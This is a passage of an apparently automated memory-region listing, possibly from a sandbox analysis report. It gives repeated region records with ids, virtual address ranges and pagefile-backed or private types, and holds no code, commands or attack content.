0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5435 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5436 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5437 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5438 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5439 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5440 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5441 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5442 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5443 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5444 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5445 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5446 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5447 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5448 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5449 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5450 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5451 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5452 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5453 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5454 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5652 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 5653 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 5654 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 5655 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 5656 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5657 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5658 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5659 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5660 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5661 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5662 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5663 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5664 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5665 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5666 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5667 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5668 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5669 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5670 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5671 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5672 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5673 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5674 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5675 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5676 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5677 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5678 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5679 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5680 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5681 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5682 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5683 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5684 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5685 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5710 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5711 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5712 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5713 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5714 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5715 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5716 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5717 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5718 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5719 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5720 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5721 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5722 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5723 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5724 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5725 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5726 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5727 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5728 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 5729 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 5730 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 5731 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 5732 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5733 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5734 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5735 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5736 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5737 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5745 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5746 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5747 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5748 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5749 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5750 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5751 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5752 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5753 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5754 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5755 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5756 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5757 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5758 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5759 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5760 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5761 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5762 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5763 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5764 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5765 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5766 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5767 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5768 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5769 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5770 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5771 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5772 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5773 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5774 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5775 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5776 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5777 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5778 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5779 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5780 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5781 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5782 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5783 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5784 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5785 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5786 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5787 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5788 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5952 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 5953 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 5954 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 5955 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 5956 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5957 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5958 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5959 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5960 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5961 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5962 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5963 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5964 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5965 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5966 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5967 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5968 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5969 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5970 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5971 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5972 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5973 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5974 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5975 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5976 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5977 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5978 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5979 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5980 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5981 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5982 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5983 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5984 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5985 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5986 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5987 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5988 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5989 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5990 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5991 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5992 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5993 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5994 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5995 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5996 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5997 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5998 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 5999 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6000 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6001 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6002 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6003 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6004 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 6005 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 6006 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 6007 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 6008 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6009 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6010 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6011 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6012 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6013 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6014 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6015 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6016 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6017 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6018 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6019 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6020 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6021 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 